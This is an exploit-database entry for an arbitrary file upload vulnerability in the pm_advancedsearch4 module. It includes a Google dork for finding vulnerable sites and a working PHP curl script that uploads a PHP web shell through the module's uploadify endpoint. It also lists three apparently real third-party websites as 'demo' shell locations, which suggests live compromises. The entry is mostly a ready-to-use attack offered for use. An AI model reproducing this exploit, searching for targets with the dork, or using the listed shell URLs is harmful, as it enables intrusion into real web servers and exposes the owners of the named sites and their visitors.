Joomla modules - pm_advancedsearch4 Arbitrary File Upload Vulnerabilit

2012-12-15T00:00:00
ID 1337DAY-ID-19980
Type zdt
Reporter Zikou-16
Modified 2012-12-15T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            -------------------------------------------------------------------------------
         Joomla modules - pm_advancedsearch4 Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------
 

#####
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"pm_advancedsearch4"
#
# Tested on : Windows 7 , Backtrack 5r3 
####

Exploit : uploadshell.php

<?php
$uploadfile="dz.php";
$ch = curl_init("http://localhost/modules/pm_advancedsearch4/js/uploadify/uploadify.php?folder=/modules/pm_advancedsearch4/js/uploadify/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://localhost/modules/pm_advancedsearch4/js/uploadify/50bcd9e474d4c.php
<?php
phpinfo();
?>
------------------------------

[#] Demos Shell :

http://aflyc.bermark.fr/modules/pm_advancedsearch4/js/uploadify/50ccd9ecc4d4c.php
http://stlwax.com/modules/pm_advancedsearch4/js/uploadify/50c5f43d10813.php/
http://www.indicedemode.fr/modules/pm_advancedsearch4/js/uploadify/50a12986c91e1.php

------------------------------ The End

#  0day.today [2018-03-01]  #